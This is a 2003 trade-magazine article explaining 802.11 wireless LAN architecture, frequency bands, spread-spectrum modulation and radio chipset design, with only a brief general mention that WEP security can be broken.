802.11
Core Technologies - The Basics
Copyright© 2003 Eddie Insam
email: edinsam@eix.co.uk
Published In Electronics World
Abstract Box
Following
from Ian Poole's article, Eddy Insam will discuss some of the low level
technologies used in implementing Wireless Local Network standards.
There is
something appealing about walking around the office or our house carrying a
wireless enabled laptop. Slouching on a sofa, typing away, far from those open
plan jungles. not a filing cabinet in sight. Too hot? walk out into the garden.
Who says productivity cannot be improved by sitting by the pool with a glass of
lemonade.
One thing
we have certainly got used to over the years is the sophistication and the
technology used to make these devices work. We simply take laptops, organisers
and cellphones for granted. Many of us will not know exactly how the bits
inside these things works, as their furious rate of development has meant that
such information is simply non existent. We may even have a suspicion that
whatever is in there will be working on well known techniques and on the same
age old concepts we all learnt at College. But none of that will help when
confronted with the simplest of technical problems, when we will feel
completely demoralised and incompetent.
There is
always the frustration of getting the things to work in the first place. We can
buy a cellphone at the high street and it works more or less the minute we
switch it on. WLANs is one of those technologies that just does not run into
such pleasant black magic. The scenario is all too typical: we go to a computer
superstore, buy all the bits, books and manuals, and as soon a we get home or
to the office, we spend the best part of a day if not more, trying to get it
all to work. So be warned, if you are intending to upgrade your office or house
network for wireless. Make sure you allocate enough time and keep away from
children and pets who may get in the way. On the plus side and when it is all
finished and working, you will have the satisfaction of being able to waste as
much time boring colleagues and friends on explaining how we got it all to work
(or not, as the case may be)
This
article is not an installation or help guide. The writer is possibly one of the
least qualified persons to do so as he hasn't even got his own system working
properly yet. However, the article contains some useful basic pointers on how
the basic technology work, and may help in deciding where problem areas are,
and in planning for the future.
Basic
Architecture and Security
A Wireless
Local area Network (WLAN) is based on an architecture consisting of one
or more radio cells. Each cell is called a Basic Service Set (BSS) and
has a limited signal range depending on the power used, the environment, and
most importantly, the presence of other sources of interfering radio energy in
the area. In practice, range is limited to a few hundred square metres, but it
can be a lot less in built up areas. Each cell is controlled by a base station
called an Access Point (AP). The simplest WLAN system consists of a
single cell with a single AP and one or more roaming wireless users, although
it is possible to run cells without an AP with the roaming stations talking
directly to each other. The AP is connected to the rest of the LAN network in
the building via Ethernet or other existing wired infrastructure. Wireless
stations can freely roam around a cell's radio area, walk into a cell
controlled by a different AP, and enter cells allocated to other networks.
Protocol software ensures that wandering wireless stations are recognized and
enumerated as they fade in and out of reach, or in and out of the different
Access Point's ranges.
The radio
range of each of the cells can overlap. This does not matter too much as
different radio channels can be assigned to each cell, This makes installation
and planning easy, as there is not need to worry about overlaps, just ensure
there are no "no coverage" black spots. Because of the packet and
error correcting nature of data communications, fade-outs and small black spots
tend to be unnoticed, and the user sees a continuous transmission between their
laptops and the base station.
Fig
1Caption: WLAN cells have a limited range and multiple cells can co-exist. The
base station software keeps a track of which remote belongs to which network.
This free
wandering scheme also means that unauthorised stations could easily listen in
or join into our networks. A WLAN enabled laptop can conceivably log in to any
network if it is within radio range. After all, all the radios work in a
similar way and use similar frequencies. Many readers may have seen news
features on TV about "hackers" sitting in the back of taxicabs or at
coffee houses, logging into nearby office networks at will. This is because
many network operators tend not to bother with enabling any kind of security
leaving their networks open for snooping by anybody within radio range.
The IEEE
802 WLAN standards provide an encrypted security mechanism based on RSA's RC4
techniques called Wired Equivalent Privacy (WEP). In practice, even this scheme
can be breached (see reference).
Chasing unsecured networks in cities has given rise to the activity of
"Warchalking" where hackers with laptops mark the areas of coverage
of local radio networks using chalk signs on the pavement outside offices.
These marks indicate the frequencies and channels open for hacking in the
locality. Wireless networks are not a secure system.
Fig 2
Caption: A sign you would not like to find on the pavement outside your office!
Why
those frequency allocations?
The choice
of frequencies for WLANs in the Gigahertz range was dictated by the
availability of large chunks of spectrum in the Instrumentation, Scientific,
and Medical (ISM) radio bands. These allocations in the 900MHz, 2.4GHz and 5Ghz
bands are conveniently allocated around the globe, so a worldwide standard
could be derived. At the same time, development of low cost, miniature
microwave components has resulted in very cheap RF modules. The net result is a
range of very low cost products using these frequencies. No wonder similar
technologies such as Bluetooth, HomeRF, Ziggy, RF tags and video senders are
sharing the benefits. (and contributing to the cross interference).
At present,
the most popular frequency is the 2.4Ghz band; with the 802.11b standard (also
known as WiFi) the most popular scheme for networking. There may be a
move in the future to the 5GHz as soon as the present band becomes clogged with
interference. Oddly enough, the end effect of interference pollution is range
reduction, rather than making the band unusable (as it would be for AM
broadcast), so expect the present band arrangement to stay for a long time.
The main
designers of the current WiFi standards were the FCC in the USA and the IEEE via
Subcommittee 802 (IEEE sub-committees follows a rather non sophisticated
numbering scheme based on the date of creation; 802 is the 8th week of the
second month, February). At the time, the IEEE wanted to ensure that the new
standards were compatible with other local and wide area network standards in
progress of definition. They also wanted to ensure the standards were more or
less independent of medium of transmission, so the WLAN 802 standards apply not
only to radio as the carrier, but also to infrared.
The first
Wireless standard to be corroborated was 802.11, which defined methods for data
transfer at 1Mbps and 2Mbps using either frequency hopping spread spectrum (FHSS)
or direct sequence spread spectrum (DSSS) using radio, or pulse position
modulation (PPM) using infrared. Commercial pressure to make the
standards more compatible with fast wired Ethernet technology resulted in
improved specifications and higher bandwidths (in exchange for fewer channels
and reduced range). The enhanced 802.11b option offered 5.5Mbps and 11Mbps
communications using more advanced modulation schemes. The penalty to pay was a
reduction in the number of coexistent networks in the band (three as opposed to
79). Further enhancements defined in 802.11g increased the bandwidth to 54Mbps
in the 2.4GHz band. Similarly, for the 5GHz band, 802.11a defined various data
rates at up to 54Mbps. As these wider band systems were meant to operate over
very short distances (e.g. within a room) problems of co-existence and
interference with other networks became less of an issue.
The two radio based spread spectrum methods,
FH and DSSS, were adapted by the standards to conform to the rather strict FCC
regulations 15.247 which controls the use of the ISM bands. The FCC established the operating rules
specifically to facilitate shared use of the band for the transmission of data
and voice by multiple users in this unlicensed environment. The specific use of
spread spectrum techniques where incorporated in order to minimise interference
with these other services. For example, analogue video senders and microwave
ovens operate at a rather constant carrier frequency. The use of packet modulation and spread
spectrum techniques schemes could (at least in theory) go some way to avoid
interference with these services. The extra complexity required of the radios
is no problem with current miniaturisation techniques. However, efficient
decoding of spread spectrum signals requires extra design qualities in radio
receiver design, such as extended dynamic range, which in many cases has not
been achieved yet.
The task
at hand - differences between wired and wireless networks
At first sight, it may appear that communication by radio is a simple task; one station transmits while the other receives. If the packets sent are not received properly after some checksum calculation, the receiver asks for a re-transmission. Is this all there is to it? Well, the collection of 802 standards easily fills a bookshelf. In particular, the standards relating to wireless system is by itself quite a fat volume. So there is obviously a bit more to it. What needs to be realised is the number of tasks a wireless network has to deal with. In addition, wireless media is drastically different to standard Ethernet (a wired media system). This is a reason why the standard specification covering Ethernet were not just enhanced to operate in a wireless environment. The main differences are:
Shared Boundaries: wireless has neither absolute nor
observable boundaries. In geographical terms, the media can be shared with
other similar wireless networks operating in different domains, including
somebody else's computer networks. Stations can wander in and out of ours, and
other people's domains while communicating.
Lack of full connectivity: In a wireless environment,
we cannot assume that all stations hear each other (which is the basic
assumption of a wired Ethernet system). The fact that a transmit station senses
the medium around it as free does not necessarily mean that the medium is free
around the receiver area.
Time varying propagation properties: signal levels
may change drastically of fade out completely for relatively long times during
a session.
Destination address does not necessarily mean
destination location: In wired LANs an address is always related to a physical
location. In wireless LANs, an address can be a message destination, which is
not necessarily a fixed location.
Real time collision detection is impractical because
this would require full duplex radio sets. Collisions can only be
predicted/assumed rather than actively detected.
In wired systems, medium error rates are minimal and
error management is usually implemented by the higher layers of a protocol. A
typical radio link may need to tolerate much higher error rates, which implies
that wireless systems must include some form of error correction capabilities
at the local level.
The
standards and encoding methods used
As
with other IEEE 802 protocols, 802.11 contains a management (MAC) layer
which deals with addressing and packet management, and a Physical Layer (PHY)
which deals with interfacing with the medium. The current IEEE standards define
a single MAC, which interacts with three optional PHY layers: FHSS, DSSS and
infrared. Of these three, DSSS is used
in most implementations today. FHSS and infrared are rarely used.
For FHSS, the FCC defined a minimum 1Mbps rate
using a two level Gaussian frequency shift keying method (2GFSK) with an
optional 2Mbps rate using four level keying (4GFSK). This is basically a
frequency modulation scheme where binary ones and zeros are represented by two
(or four) closely spaced frequencies. Further to this, the average carrier
frequency is caused to slowly jump around the 79 allocated channels in the band
in a pseudorandom (PN) fashion, with the receiver tracking the
transmitter as both generate the same timed PN sequence. The FSK modulation
scheme is preferred in FHSS systems as it is difficult for the hopping
synthesiser to maintain phase coherence over the wide hopping bandwidth, FSK is
also relatively easy to demodulate non-coherently. The centre frequencies for
the 79 channels are defined in 1MHz steps beginning at 2.402GHz and ending at
2.480GHz. (Other similar allocations are defined for Europe and Japan). The actual
hop rate is not defined by the specifications but is usually greater than 2.5
hops per second. In order to maintain the 1 MHz channel spacing and keep with
the strict FCC bandwidth requirements, the FSK modulation index is kept small
(maximum of +-160KHz) resulting in a non-optimal modulation scheme. One side
effect of this is that attempts to increase channel capacity by addition of
multi levels results in a degraded signal to noise ratio trade-off. In other
words, the use of narrow FSK becomes impractical for higher capacity systems
due to the prohibitively high signal-to-noise ratios required for the
constrained bandwidth specified.
Where more bandwidth is required, a DSSS
approach is used. Like FHSS, DSSS uses a PN code to spread the signal. The DSSS
encoding method used in 802.11b is not new. Similar technology is being used in
GPS satellite navigation systems and in CDMA cellular telephones. In the basic
1Mbps DSSS system, the information data stream at 1Mbps is combined via an
exclusive or (XOR) function with a high-speed pseudo-random numerical sequence
running at 11MHz. The PN specified by 802.11b is an 11 chip Barker code. This
particular sequence has well known autocorrelation and comma-free properties
that makes it suitable for this application. The term chip is normally
used to denote bit positions in a PN to denote the fact that the Barker code
does not carry any binary information by itself. The result of the XOR
operation is an 11Mbps digital stream, which is then modulated onto the 2.4GHz
carrier using Differential Binary Phase Shift Keying (DBPSK), i.e. the
carrier phase is inverted or not inverted depending on the incoming signal
binary data transitions. The effect of the pseudo random modulation (or
scrambling) is to spread the transmitted bandwidth of the resulting signal by a
ratio of 11:1 (hence the term “spread spectrum”). The total bandwidth required
is just under 20MHz; the peak power of the signal is also reduced by a similar
ratio. DSSS signals are nominally spaced 30MHz apart, so up to three DSSS
networks can coexist in the 2.4GHz band (note how the use of DSSS reduces the
original 79 channel band capacity to a maximum of three users). Upon reception,
the signal is recovered using a correlation process with a locally generated version
of the same PN chip sequence. The correlation process has a significant
benefit; it reduces the level of narrow band interference, which falls in band
by the same 11:1 ratio. This effect is known as processing gain.
Fig 3 Caption: Spread spectrum is simply
obtained by XORing the data stream with a much faster, predictable
"chip" sequence. This has the effect of spreading the transmitted
power over a wider band. The receiver must be able to receive the whole
bandwidth and recover the original data stream using an inverse process.
In the 2Mbps DSSS option, the modulation system used is Differential Quadrature Phase Shift Keying (DQPSK), which effectively doubles the bit rate without increasing the radio bandwidth. This is done by modulating both the in-phase and quadrature versions of the RF carrier (known as I and Q modulation) the penalty to pay is a slightly lower signal to noise ratio.
The faster 5.5Mbps and 11Mbps DSSS options use Complementary
Code Keying (CCK) to further compress the data rate, while still
maintaining the same overall bandwidth. In CCK modulation, input data is XORed
with a spreading chip sequences much in the same way as in the 1Mbps system
described above. However, the chip sequences have 8 chips each (as opposed to
Barker 11 chips sequences). Each data input symbol is modulated with one of 256
chip sequence combinations to produce an 8-bit data message for every symbol to
be transmitted. The chip codes are based on complementary codes, which are in
turn related to Hadamard and Walsh functions. Complementary codes have the
important property that the cross correlation between any two codeword is zero,
so a data stream can be detected by the receiver implementing a number of
parallel matched filters, with each "tuned" to one codeword, a
majority detector then selects the strongest output. On the 11Mbps system, each data byte to be
transmitted is partitioned into a 6 bit selector, which his used to select one
of 64 chip spread sequences, and the other 2 bits are used to phase invert
modulate that symbol. Each of the 64 sequences contains terms in the I and Q
phases. Thus, the total possible number of combinations of sequence and carrier
phases is 256. The 5.5 Mbps option operates in a similar way, but does not use
quadrature modulation.
How do
the radios work?
By radios,
we really mean chipsets. Most manufacturers offer IC chip combinations that can
be assembled onto PCBs to form complete radios. A typical chipset is the
Intersil PRISM family of devices. These are based around common modules such as
RF amplifier, TX power driver, IF amplifier, mixer, baseband processor, and MAC
logic interface to the host or network. A number of supporting ICs include
PLLs, duplex switches, and passives such as coils, crystals and band-pass elements.
Signal from the built in 2.4GHz aerial is connected via passive band-pass filters to the TX/RX switch, which may also contain a RF amplifier and a programmable power TX amplifier. The signal is now split into the TX and the RX channel. Both are fed into the RF/IF chip, which mixes the signal down to an intermediate frequency of around 280MHz. The local oscillator is a VCO or PLL controlled by serial signals from the control microprocessor. The oscillator may range between 2132MHz to 2204MHz, to give the required IF frequency. The use of such a relatively low IF frequency makes filtering much easier, although the latest generation of radio sets can now do mixing directly to baseband from 2.4GHz rate without the need for an IF stage.
Fig 4
Caption: front end of a typical 802.11b radio. These simple designs lack
sophistication in terms of signal handling, but are perfectly adequate for the
short distances involved. Both transmit and receive gains are constantly
controlled to ensure a fixed voltage at the detectors. The latest generation of
radios do not use intermediate frequencies and convert directly to baseband
from RF.
Discrete band-pass IF filters are used to limit the bandwidth to just under 20MHz, enough to isolate one channel. The IF signal goes through two limiting amplifiers and further 280MHz SAW band pass filtering. The purpose of the limiters is to fix the amplitude of the signal to a relatively fixed value (around 200mV) under all input signal conditions. This levelling is in addition to the AGC provided by the variable gain RF and IF stages. The integrated receivers have limited intrinsic dynamic range, and their gain needs to be critically adjusted by the control microprocessor in order to ensure the radio outputs levels are relatively constant in amplitude. In practice, both RF and IF amplifiers are fed from an AGC signal derived from a D/A converter to provide this compensation
The signal is then demodulated to baseband using two
quadrature multipliers operating at the IF frequency. The reference used is a
locally generated VCO phase locked 560MHz oscillator, from which the two
quadrature 90 degree out of phase signals are generated. The two resulting quadrature outputs are low
pass filtered and fed to the baseband processor. Here, the two signals are
analog to digital converted in wideband 3 bit converters at a rate of 22Msps,
which results in two 3 bit data samples per input chip. At this point, the
signals are baseband spread spectrum and of a constant vector amplitude. In
other words, each quadrature I and Q input may vary in amplitude, but their
combined vector sum will be constant in amplitude. The baseband processor then
correlates the signal with a locally generated PN spreading to remove it and to
uncover the differential BPSK (or QPSK) data.
At this point the
data packets, which now resemble MAC packets, are fed to the MAC processor (not
shown) All packet signals have a preamble followed by a header containing a
standard IEEE 802 frame including a start frame delimiter, headers and a cyclic
redundancy check (CRC). The MAC processes the header data to locate the start
of frame, determine the mode and length of the incoming message and check the
CRC. The MAC then processes the packet data and sends it on through the bus
interface to the host computer. The MAC also checks the CRC to determine the
data purity. If corrupted data is received, a retransmission is requested
locally by the MAC, as specified in the IEEE protocol specifications.
Fig 5 Caption: Baseband detector uses quadrature demodulation and simple three bit A/D converter sampling at about three times the chip rate to feed the all digital convolutional decoder.
The MAC processor
also includes methods for synchronising the link and establishing timing
relationships. The system initially uses simple differential detection to
identify and lock onto the signal. It then makes measurements of the carrier
and symbol timing phase and frequency and uses these to initialise tracking
loops for fast acquisition. Once demodulating and tracking, the processor uses
coherent demodulation for best performance.
For transmission, the Baseband Processor
scrambles the packet and differentially encodes it before applying the spread
spectrum modulation. The data can be either DBPSK or DQPSK modulated and is a
baseband quadrature signal with I and Q components. The BPSK spreading is a
chip sequence that is modulated with the I and Q data components. Transmit
quadrature single-bit digital inputs are low passed and applied to the
Quadrature IF Modulator/Demodulator from the Baseband Processor. The IF signal
is bandpass filtered and applied to the up mixer. A variable gain RF amplifier
feed the transmit aerial with a controlled signal. This is to ensure no more RF
signal than necessary is transmitted.
A word
on spread spectrum
Spread spectrum
techniques can be used to improve the performance of a communications channel.
However, it is important to realise that for a receiver to be able to realise
this potential, they must be designed to a higher specification than their
normal counterparts. Specifically, they must be designed to detect small wanted
signals in the presence of large amounts of background noise. This implies the
receivers must possess much improved levels of linearity and dynamic range.
Many simple WLAN radios do not posses such characteristics, with a
corresponding degradation in performance. Remembering that WLAN system are designed to
work within a very a local environment, this is not much of a problem.
The
Future
The fast
growth of the use of these bands will ensure they will become saturated sooner
than later. . With the proliferation of 2.4 GHz equipment and interference, the
bands are bound to get congested very quickly. The net result will be
reductions in range to feet rather than yards. Any forward planning for the use
of equipment in this band must take this into consideration.
The
Author
Dr Eddie
Insam is a consultant in innovative applications of telecommunications and
specialises in graphics and signal processing. He can be reached on
edinsam@eix.co.uk.
For More
Information
To obtain the full set of relevant IEEE standards, visit the IEEE website, or enter "802 IEEE" from any online search engine.
AT&T Lab Technical Report TD-4ZCPZZ. "Using the Fluhrer, Mantin and Shamir Aattack to Break WEP" August 2001.
Also, Eddie Insam’s book TCP/IP Embedded Internet Applications (published August 2003 by Newnes) gives more information about LAN and WLAN technology and principles.